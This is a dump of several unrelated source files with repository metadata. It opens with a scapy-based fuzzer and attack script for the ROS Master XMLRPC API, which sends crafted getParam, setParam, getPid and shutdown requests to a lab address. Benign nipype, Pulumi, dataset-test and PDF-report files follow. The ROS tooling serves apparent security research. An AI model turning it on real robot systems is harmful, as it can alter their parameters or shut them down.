+ raw(log_info).decode("iso-8859-1")
)
# log_msg_encoded = log_info
if type_event == "fuzzing":
try:
fd = open("fuzz.log", "a")
except IOError as err:
return "[!] Error opening log file: %s" % str(err)
elif type_event == "error":
try:
fd = open("error.log", "a")
except IOError as err:
return "[!] Error opening error file: %s" % str(err)
elif type_event == "weird":
try:
fd = open("weird.log", "a")
except IOError as err:
return "[!] Error opening error file: %s" % str(err)
else:
return "[!] '%s' is an unrecognized log event type." % type_event
if fd:
fd.write(log_msg)
return
def preamble():
"""
ROS XMLRPC preamble
returns: (bool, answer) tuple; the bool indicates whether the TCP handshake succeeded
"""
# send the SYN, receive response
p_attack = IP(version=4, frag=0, ttl=64, proto=6, dst="12.0.0.2") / TCP(
sport=origin_port, dport=11311, seq=0, ack=0, flags=2
)
ans = sr1(p_attack, retry=0, timeout=1)
# ans = srp1(p_attack, retry=0, timeout=1)
if ans and len(ans) > 0 and ans[TCP].flags == "SA":
# print(ans.summary()) # debug
# ls(ans) # debug
# send the ACK
p_attack = IP(
version=4, ihl=5, flags=2, frag=0, ttl=64, proto=6, dst="12.0.0.2"
) / TCP(
sport=origin_port,
dport=11311,
flags=16,
seq=ans[TCP].ack,
ack=ans[TCP].seq + 1,
)
send(p_attack)
return True, ans
else:
return False, ans
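# Usage sketch (the global `origin_port` must be set before calling, as done in
# the core logic at the bottom of this file):
#
#   origin_port = random.randint(1000, 65000)
#   ok, synack = preamble()   # True plus the SYN/ACK packet when the handshake succeeded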
def process_xmlrpc_response(p_attack, ans, unans, field_name=None):
"""
Abstracts how the different functions process the XMLRPC responses
for logging and analysis purposes.
param p_attack: package used during the attack
param ans: first result from scapy sr
param uans: second result from scapy sr
param field_name: field_name to consider when logging/evaluating
Essentially:
1. makes sure that there's an answer
2. fetches the field to evaluate (or None)
3. Checks results and responses and logs accordingly
"""
# check if there's been an answer at all
if len(ans) > 0:
# ans.show() # debug
# print(list(ans[0][1])[0][XMLRPC]) # debug
# print(ans[0][1][1][XMLRPC]) # debug
response = list(ans[0][1])[0]
if response == None:
red("response None")
# give it some colour for visual debugging:
# print(response[XMLRPC])
# print(response) # debug
# print(type(response)) # debug
# print(b"Error" in response) # debug
# print(b"Error" in raw(response)) # debug
field_evaluated = getattr(p_attack, field_name)
if (
b"Error" in raw(response)
or b"is not set" in raw(response)
or b"Exception" in raw(response)
or b"missing required caller_id" in raw(response)
):
red(response[XMLRPC])
if not field_evaluated in errors_list:
log_events(p_attack[XMLRPC], "error")
errors_list.append(field_evaluated)
# params, /rosdistro
elif (
b"melodic" in raw(response) # hardcoded for testing setup
and b"<int>1</int>" in raw(response)
and field_name == "params"
):
yellow(response[XMLRPC])
if not field_evaluated in valid_list:
log_events(p_attack[XMLRPC], "fuzzing")
valid_list.append(field_evaluated)
# params, setParam
elif (
b"parameter" in raw(response) # hardcoded for testing setup
and b"<int>1</int>" in raw(response)
and b"set" in raw(response)
# and b"<int>0</int>" in raw(response)
and field_name == "params"
):
yellow(response[XMLRPC])
if not field_evaluated in valid_list:
log_events(p_attack[XMLRPC], "fuzzing")
valid_list.append(field_evaluated)
# getPid
elif b"<int>1</int>" in raw(response) and field_name == "methodname":
yellow(response[XMLRPC])
if not field_evaluated in valid_list:
log_events(p_attack[XMLRPC], "fuzzing")
valid_list.append(field_evaluated)
else:
# something weird happened, review
magenta(response[XMLRPC])
if not field_evaluated in weird_list:
log_events(p_attack[XMLRPC], "weird")
weird_list.append(field_evaluated)
#################
# send the ACK so that we don't get spammed for retransmissions
#################
ack = IP(
version=4, ihl=5, flags=2, frag=0, ttl=64, proto=6, dst="12.0.0.2"
) / TCP(
sport=origin_port,
dport=11311,
flags=16,
seq=response[TCP].ack,
ack=len(response[TCP].payload) + response[TCP].seq,
)
send(ack)
###################################################################################
# ATTACKS
###################################################################################
def rosparam_get_rosdistro():
"""
An auxiliary function to send a "rosparam get /rosdistro"
Sending the following params:
b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>/rosdistro</string></value>\n</param>\n"
"""
success, ans = preamble()
if success:
# Using default packages
p_attack = package_rosparam_get_rosdistro
# p_attack = package_rosparam_get_missing_callerid
# p_attack = package_rosparam_get_rosdistro_long
# p_attack = package_xxe
# default package to execute "rosparam get /rosdistro"
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
# adjust size of XMLRPC package payload
print(len(p_attack[HTTPRequest].payload))
p_attack[HTTPRequest].Content_Length = str(
len(p_attack[HTTPRequest].payload)
).encode("iso-8859-1")
gray(p_attack[XMLRPC]) # debug sent package
# # send and receive potentially huge packages
# fragments = fragment(p_attack, 800)
# print(len(fragments))
# for f in fragments:
# send(f)
#
# ans = sniff(iface="eth0", filter="tcp", timeout=2)
# print(ans.show())
# # print(ans[0])
# # print(ans[1])
ans, unans = sr(p_attack, timeout=0.5)
# process the response coherently and return ACK
process_xmlrpc_response(p_attack, ans, unans, "params")
def getpid():
"""
An auxiliary function to send a "getPid" XMLRPC request to the ROS Master.
"""
success, ans = preamble()
if success:
p_attack = package_getPid
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
ans, unans = sr(p_attack)
# process the response coherently and return ACK
process_xmlrpc_response(p_attack, ans, unans, "methodname")
def rosparam_set_param():
"""
An auxiliary function to send a "rosparam set /rosdistro whatever"
"""
success, ans = preamble()
if success:
# Using default packages
# p_attack = package_rosparam_get_rosdistro
p_attack = package_rosparam_set_weird
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
p_attack[XMLRPCCall].methodname = b"setParam"
# # force setting it
# params = "<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>/rosdistro</string></value>\n</param>\n<param>\n<value><string>whatever</string></value>\n</param>\n"
# params = params.encode("iso-8859-1")
# p_attack[XMLRPCCall].params = params
# adjust size of XMLRPC package payload
p_attack[HTTPRequest].Content_Length = str(
len(p_attack[HTTPRequest].payload)
).encode("iso-8859-1")
# debug output
ans, unans = sr(p_attack, timeout=3)
# process the response coherently and return ACK
process_xmlrpc_response(p_attack, ans, unans, "params")
def shutdown():
"""
Call the shutdown method from the external API defined as:
Stop this server
@param caller_id: ROS caller id
@type caller_id: str
@param msg: a message describing why the node is being shutdown.
@type msg: str
@return: [code, msg, 0]
@rtype: [int, str, int]
"""
success, ans = preamble()
if success:
# Using default packages
p_attack = package_shutdown
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
# adjust size of XMLRPC package payload
p_attack[HTTPRequest].Content_Length = str(
len(p_attack[HTTPRequest].payload)
).encode("iso-8859-1")
# gray(p_attack[XMLRPC].params) # debug package to send
ans, unans = sr(p_attack, timeout=5)
# process the response coherently and return ACK
process_xmlrpc_response(p_attack, ans, unans, field_to_fuzz)
def rosparam_get_fuzzing(field_name="params"):
"""
An auxiliary function to send a "rosparam get ..." while fuzzing
Sending the following default params:
b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>/rosdistro</string></value>\n</param>\n"
"""
success, ans = preamble()
if success:
# Using default packages
p_attack = package_rosparam_get_rosdistro
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
# fuzzing
field = random.choice(valid_list) # randomly pick from the list of valid ones
field_mutated = None
while not field_mutated:
if random.random() < FUZZ_FACTOR / 100:
field_mutated = mutate(field)
# set fuzzed value into the attack
setattr(p_attack, field_name, field_mutated)
# adjust size of XMLRPC package payload
p_attack[HTTPRequest].Content_Length = str(
len(p_attack[HTTPRequest].payload)
).encode("iso-8859-1")
gray(p_attack[XMLRPC].params) # debug package to send
ans, unans = sr(p_attack, timeout=2)
# process the response coherently and return ACK
process_xmlrpc_response(p_attack, ans, unans, field_name)
def fuzz_XMLRPC():
"""
Fuzz a whole XMLRPC package
"""
success, ans = preamble()
if success:
# Using default packages
p_attack = copy.deepcopy(package_rosparam_get_rosdistro)
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
# fuzzing
field = random.choice(valid_list) # randomly pick from the list of valid ones
field_mutated = None
while not field_mutated:
if random.random() < FUZZ_FACTOR / 100:
field_mutated = mutate(field)
# set fuzzed value into the attack
p_attack[XMLRPCCall] = XMLRPCCall(field_mutated)
# adjust size of XMLRPC package payload
p_attack[HTTPRequest].Content_Length = str(
len(p_attack[HTTPRequest].payload)
).encode("iso-8859-1")
# debug output
gray(p_attack[XMLRPC])
ans, unans = sr(p_attack, timeout=3)
# process the response coherently and return ACK
process_xmlrpc_response(p_attack, ans, unans, "params")
def rosparam_set_param_fuzzing():
"""
An auxiliary function to send a "rosparam set /something whatever"
"""
success, ans = preamble()
if success:
# Using default packages
p_attack = package_rosparam_get_rosdistro
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
p_attack[XMLRPCCall].methodname = b"setParam"
# fuzzing
## field_name
field_name = random.choice(
valid_list_name
) # randomly pick from the list of valid ones
field_name_mutated = None
while not field_name_mutated:
if random.random() < FUZZ_FACTOR / 100:
field_name_mutated = mutate(field_name)
## field_value
field_value = random.choice(
valid_list_value
) # randomly pick from the list of valid ones
field_value_mutated = None
while not field_value_mutated:
if random.random() < FUZZ_FACTOR / 100:
field_value_mutated = mutate(field_value)
params_raw = (
b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>/"
+ field_name_mutated
+ b"</string></value>\n</param>\n<param>\n<value><string>"
+ field_value_mutated
+ b"</string></value>\n</param>\n"
)
# params = params_raw.encode("iso-8859-1")
params = params_raw
# set fuzzed value into the attack
# setattr(p_attack, "params", params) # another way of doing it
p_attack[XMLRPCCall].params = params
# adjust size of XMLRPC package payload
p_attack[HTTPRequest].Content_Length = str(
len(p_attack[HTTPRequest].payload)
).encode("iso-8859-1")
# debug output
ans, unans = sr(p_attack, timeout=3)
# process the response coherently and return ACK
# check if there's been an answer at all
if len(ans) > 0:
# ans.show() # debug
# print(list(ans[0][1])[0][XMLRPC]) # debug
# print(ans[0][1][1][XMLRPC]) # debug
response = list(ans[0][1])[0]
if response == None:
red("response None")
# give it some colour for visual debugging:
# print(response[XMLRPC])
# print(response) # debug
# print(type(response)) # debug
# print(b"Error" in response) # debug
# print(b"Error" in raw(response)) # debug
# in this case, we add the complete params to the errors and weird lists,
# whereas for valid responses we separate name and value into two lists
# for further combination exploration
field_evaluated = params_raw
if (
b"Error" in raw(response)
or b"is not set" in raw(response)
or b"Exception" in raw(response)
):
red(response[XMLRPC])
if not field_evaluated in errors_list:
log_events(p_attack[XMLRPC], "error")
errors_list.append(field_evaluated)
# params, setParam
elif (
b"parameter" in raw(response) # hardcoded for testing setup
and b"<int>1</int>" in raw(response)
and b"set" in raw(response)
and b"<int>0</int>" in raw(response)
):
yellow(response[XMLRPC])
# name
if not field_name_mutated in valid_list_name:
log_events(p_attack[XMLRPC], "fuzzing")
valid_list_name.append(field_name_mutated)
# value
if not field_value_mutated in valid_list_value:
log_events(p_attack[XMLRPC], "fuzzing")
valid_list_value.append(field_value_mutated)
else:
# something weird happened, review
magenta(response[XMLRPC])
if not field_evaluated in weird_list:
log_events(p_attack[XMLRPC], "weird")
weird_list.append(field_evaluated)
#################
# send the ACK so that we don't get spammed for retransmissions
#################
ack = IP(
version=4, ihl=5, flags=2, frag=0, ttl=64, proto=6, dst="12.0.0.2"
) / TCP(
sport=origin_port,
dport=11311,
flags=16,
seq=response[TCP].ack,
ack=len(response[TCP].payload) + response[TCP].seq,
)
send(ack)
###################################################################################
# CORE LOGIC
###################################################################################
# # ##############################
# # # fuzzing getParam
# # ##############################
# field_to_fuzz = "params" # "methodname", "params"
# weird_list = [] # list containing weird/non-accounted responses
# errors_list = [] # a list containing each
# # of the target fields of the fuzzing that leads to errors
#
# # a list containing each of the target fields of the fuzzing
# # that lead to valid responses; starts with one valid entry so that it can iterate
# valid_list = [
# getattr(package_rosparam_get_rosdistro, field_to_fuzz),
# # b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>/rosdistro</string></value>\n</param>\n"
# # b"getParam"
# # raw(package_rosparam_get_rosdistro[XMLRPCCall])
# ]
#
# while True:
# origin_port = random.randint(1000, 65000)
# rosparam_get_fuzzing(field_to_fuzz)
# red("Error candidates: " + str(len(errors_list)))
# yellow("Valid candidates: " + str(len(valid_list)))
# magenta("Weird candidates: " + str(len(weird_list)))
# ##############################
# # fuzzing setParam
# ##############################
# weird_list = [] # list containing weird/non-accounted responses
# errors_list = [] # a list containing each
#
# valid_list_name = [b"/rosdistro"]
# valid_list_value = [b"indigo"]
#
# while True:
# origin_port = random.randint(1000, 65000)
# rosparam_set_param_fuzzing()
# red("Error candidates: " + str(len(errors_list)))
# yellow("Valid name candidates: " + str(len(valid_list_name)))
# yellow("Valid value candidates: " + str(len(valid_list_value)))
# magenta("Weird candidates: " + str(len(weird_list)))
# ##############################
# # fuzzing whole XMLRPCCall
# ##############################
# weird_list = []
# errors_list = []
# valid_list = [
# raw(package_rosparam_get_rosdistro[XMLRPCCall]),
# raw(package_getPid[XMLRPCCall]),
# # raw(package_shutdown[XMLRPCCall]),
# ]
#
# while True:
# origin_port = random.randint(1000, 65000)
# fuzz_XMLRPC()
# red("Error candidates: " + str(len(errors_list)))
# yellow("Valid candidates: " + str(len(valid_list)))
# magenta("Weird candidates: " + str(len(weird_list)))
#############################
# individual attacks testing (no real fuzzing in here)
#############################
origin_port = random.randint(1000, 65000)
field_to_fuzz = "params" # "methodname", "params"
weird_list = [] # list containing weird/non-accounted responses
errors_list = [] # a list containing each fuzzed field that led to an error
valid_list = []
# while True:
# origin_port = random.randint(1000, 65000)
# rosparam_get_rosdistro() # send a rosparam get /rosdistro request
rosparam_get_rosdistro() # send a rosparam get /rosdistro request
# getpid() # fetch PID from ROS Master
# rosparam_set_param() # set the param
# shutdown()
# fuzz_XMLRPC()
# ###### Testing of the dissector ##########
#
# # packages = rdpcap("test.pcap")
# packages = rdpcap("test3.pcap")
# packages.show()
#
# p = packages[3]
# # print(p.summary())
#
# # print(p)
# # p.show()
# # print(p.command())
# # hexdump(p)
# ############################
| 34.510436
| 1,229
| 0.585693
|
9250eb1c93643d16e8d87b3e1a0c0a5fb5413ec5
| 71
|
py
|
Python
|
neural_image_styler/__main__.py
|
jake-g/neural_image_styler
|
0b9f88fba4dcfed495ee3a6eac0801e4732df4fc
|
[
"MIT"
] | null | null | null |
neural_image_styler/__main__.py
|
jake-g/neural_image_styler
|
0b9f88fba4dcfed495ee3a6eac0801e4732df4fc
|
[
"MIT"
] | null | null | null |
neural_image_styler/__main__.py
|
jake-g/neural_image_styler
|
0b9f88fba4dcfed495ee3a6eac0801e4732df4fc
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from .neural_image_styler import main
main()
| 11.833333
| 37
| 0.661972
|
883c882aa1c661f304ea039eee9d053da81df220
| 2,150
|
py
|
Python
|
nipype/interfaces/brainsuite/tests/test_auto_Bse.py
|
HussainAther/nipype
|
7e33d086fd5cea6ef6de99ee3e35929c1d5730d4
|
[
"Apache-2.0"
] | null | null | null |
nipype/interfaces/brainsuite/tests/test_auto_Bse.py
|
HussainAther/nipype
|
7e33d086fd5cea6ef6de99ee3e35929c1d5730d4
|
[
"Apache-2.0"
] | null | null | null |
nipype/interfaces/brainsuite/tests/test_auto_Bse.py
|
HussainAther/nipype
|
7e33d086fd5cea6ef6de99ee3e35929c1d5730d4
|
[
"Apache-2.0"
] | null | null | null |
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..brainsuite import Bse
def test_Bse_inputs():
input_map = dict(args=dict(argstr='%s',
),
diffusionConstant=dict(argstr='-d %f',
usedefault=True,
),
diffusionIterations=dict(argstr='-n %d',
usedefault=True,
),
dilateFinalMask=dict(argstr='-p',
usedefault=True,
),
edgeDetectionConstant=dict(argstr='-s %f',
usedefault=True,
),
environ=dict(nohash=True,
usedefault=True,
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
inputMRIFile=dict(argstr='-i %s',
mandatory=True,
),
noRotate=dict(argstr='--norotate',
),
outputCortexFile=dict(argstr='--cortex %s',
hash_files=False,
),
outputDetailedBrainMask=dict(argstr='--hires %s',
hash_files=False,
),
outputDiffusionFilter=dict(argstr='--adf %s',
hash_files=False,
),
outputEdgeMap=dict(argstr='--edge %s',
hash_files=False,
),
outputMRIVolume=dict(argstr='-o %s',
genfile=True,
hash_files=False,
),
outputMaskFile=dict(argstr='--mask %s',
genfile=True,
hash_files=False,
),
radius=dict(argstr='-r %f',
usedefault=True,
),
terminal_output=dict(deprecated='1.0.0',
nohash=True,
),
timer=dict(argstr='--timer',
),
trim=dict(argstr='--trim',
usedefault=True,
),
verbosityLevel=dict(argstr='-v %f',
usedefault=True,
),
)
inputs = Bse.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_Bse_outputs():
output_map = dict(outputCortexFile=dict(),
outputDetailedBrainMask=dict(),
outputDiffusionFilter=dict(),
outputEdgeMap=dict(),
outputMRIVolume=dict(),
outputMaskFile=dict(),
)
outputs = Bse.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
| 24.712644
| 67
| 0.627442
|
79ce2fe5b3776f1e19b640509eb97c2f7b29e710
| 592
|
py
|
Python
|
tests/r/test_wght_loss_incentive7.py
|
hajime9652/observations
|
2c8b1ac31025938cb17762e540f2f592e302d5de
|
[
"Apache-2.0"
] | 199
|
2017-07-24T01:34:27.000Z
|
2022-01-29T00:50:55.000Z
|
tests/r/test_wght_loss_incentive7.py
|
hajime9652/observations
|
2c8b1ac31025938cb17762e540f2f592e302d5de
|
[
"Apache-2.0"
] | 46
|
2017-09-05T19:27:20.000Z
|
2019-01-07T09:47:26.000Z
|
tests/r/test_wght_loss_incentive7.py
|
hajime9652/observations
|
2c8b1ac31025938cb17762e540f2f592e302d5de
|
[
"Apache-2.0"
] | 45
|
2017-07-26T00:10:44.000Z
|
2022-03-16T20:44:59.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.wght_loss_incentive7 import wght_loss_incentive7
def test_wght_loss_incentive7():
"""Test module wght_loss_incentive7.py by downloading
wght_loss_incentive7.csv and testing shape of
extracted data has 33 rows and 2 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = wght_loss_incentive7(test_path)
try:
assert x_train.shape == (33, 2)
except:
shutil.rmtree(test_path)
raise
| 24.666667
| 68
| 0.785473
|
ae2d6549c5bb9dcd389e0458d304220dc4248af0
| 10,788
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/network/v20180401/connection_monitor.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 31
|
2020-09-21T09:41:01.000Z
|
2021-02-26T13:21:59.000Z
|
sdk/python/pulumi_azure_nextgen/network/v20180401/connection_monitor.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 231
|
2020-09-21T09:38:45.000Z
|
2021-03-01T11:16:03.000Z
|
sdk/python/pulumi_azure_nextgen/network/v20180401/connection_monitor.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 4
|
2020-09-29T14:14:59.000Z
|
2021-02-10T20:38:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['ConnectionMonitor']
class ConnectionMonitor(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_start: Optional[pulumi.Input[bool]] = None,
connection_monitor_name: Optional[pulumi.Input[str]] = None,
destination: Optional[pulumi.Input[pulumi.InputType['ConnectionMonitorDestinationArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
monitoring_interval_in_seconds: Optional[pulumi.Input[int]] = None,
network_watcher_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[pulumi.InputType['ConnectionMonitorSourceArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Information about the connection monitor.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] auto_start: Determines if the connection monitor will start automatically once created.
:param pulumi.Input[str] connection_monitor_name: The name of the connection monitor.
:param pulumi.Input[pulumi.InputType['ConnectionMonitorDestinationArgs']] destination: Describes the destination of connection monitor.
:param pulumi.Input[str] location: Connection monitor location.
:param pulumi.Input[int] monitoring_interval_in_seconds: Monitoring interval in seconds.
:param pulumi.Input[str] network_watcher_name: The name of the Network Watcher resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group containing Network Watcher.
:param pulumi.Input[pulumi.InputType['ConnectionMonitorSourceArgs']] source: Describes the source of connection monitor.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Connection monitor tags.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if auto_start is None:
auto_start = True
__props__['auto_start'] = auto_start
__props__['connection_monitor_name'] = connection_monitor_name
if destination is None and not opts.urn:
raise TypeError("Missing required property 'destination'")
__props__['destination'] = destination
__props__['location'] = location
if monitoring_interval_in_seconds is None:
monitoring_interval_in_seconds = 60
__props__['monitoring_interval_in_seconds'] = monitoring_interval_in_seconds
if network_watcher_name is None and not opts.urn:
raise TypeError("Missing required property 'network_watcher_name'")
__props__['network_watcher_name'] = network_watcher_name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if source is None and not opts.urn:
raise TypeError("Missing required property 'source'")
__props__['source'] = source
__props__['tags'] = tags
__props__['etag'] = None
__props__['monitoring_status'] = None
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['start_time'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/latest:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20171001:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20171101:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20180101:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20180201:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20180601:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20180701:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20180801:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20181001:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20181101:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20181201:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20190201:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20190401:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20190601:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20190701:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20190801:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20190901:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20191101:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20191201:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20200301:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20200401:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20200501:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20200601:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20200701:ConnectionMonitor"), pulumi.Alias(type_="azure-nextgen:network/v20200801:ConnectionMonitor")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(ConnectionMonitor, __self__).__init__(
'azure-nextgen:network/v20180401:ConnectionMonitor',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ConnectionMonitor':
"""
Get an existing ConnectionMonitor resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return ConnectionMonitor(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="autoStart")
def auto_start(self) -> pulumi.Output[Optional[bool]]:
"""
Determines if the connection monitor will start automatically once created.
"""
return pulumi.get(self, "auto_start")
@property
@pulumi.getter
def destination(self) -> pulumi.Output['outputs.ConnectionMonitorDestinationResponse']:
"""
Describes the destination of connection monitor.
"""
return pulumi.get(self, "destination")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "etag")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Connection monitor location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="monitoringIntervalInSeconds")
def monitoring_interval_in_seconds(self) -> pulumi.Output[Optional[int]]:
"""
Monitoring interval in seconds.
"""
return pulumi.get(self, "monitoring_interval_in_seconds")
@property
@pulumi.getter(name="monitoringStatus")
def monitoring_status(self) -> pulumi.Output[Optional[str]]:
"""
The monitoring status of the connection monitor.
"""
return pulumi.get(self, "monitoring_status")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the connection monitor.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[Optional[str]]:
"""
The provisioning state of the connection monitor.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def source(self) -> pulumi.Output['outputs.ConnectionMonitorSourceResponse']:
"""
Describes the source of connection monitor.
"""
return pulumi.get(self, "source")
@property
@pulumi.getter(name="startTime")
def start_time(self) -> pulumi.Output[Optional[str]]:
"""
The date and time when the connection monitor was started.
"""
return pulumi.get(self, "start_time")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Connection monitor tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Connection monitor type.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 49.944444
| 1,938
| 0.679366
|
bceebf7097a7b81b4c9137804e3083095be9a9c4
| 5,852
|
py
|
Python
|
Frontend/PrintPDF.py
|
ShowingCloud/Capricorn
|
cfe521975ca23f7502509595f1fd3f8c6c5e1c55
|
[
"MIT"
] | null | null | null |
Frontend/PrintPDF.py
|
ShowingCloud/Capricorn
|
cfe521975ca23f7502509595f1fd3f8c6c5e1c55
|
[
"MIT"
] | null | null | null |
Frontend/PrintPDF.py
|
ShowingCloud/Capricorn
|
cfe521975ca23f7502509595f1fd3f8c6c5e1c55
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Created on 2013-3-28
@author: Pyroshow
'''
from Models.EngineeringDB import *
from Models.LocalDB import *
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.platypus import *
from reportlab.lib import pagesizes, colors
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import *
from reportlab.pdfbase import *
TABLEFields, TABLEProductList, TABLEFireSequence = xrange (3)
class PrintTable():
def __init__ (self, sess, session, table, parent = None):
self.table = table
if self.table == TABLEFields:
a = [['BoxID','ConnectorID','Size','RisingHeight','Name']]
elif self.table == TABLEProductList:
a = [['ItemNo','Size','Type','Name']]
elif self.table == TABLEFireSequence:
a = [['BoxID','IgnitionTime','FieldID','Name']]
else:
return
        # set the column headers according to the table type
with session.begin():
data = session.query(ScriptData).all()
        # fetch all rows from ScriptData
for row1 in data:
with session.begin():
row2 = session.query(IgnitorsData).filter_by(UUID = row1.IgnitorID).first()
            # fetch the first matching row from IgnitorsData
with sess.begin():
row3 = sess.query(FireworksData).filter_by(UUID = row1.FireworkID).first()
            # fetch the first matching row from FireworksData
b = []
            if self.table == TABLEFields:
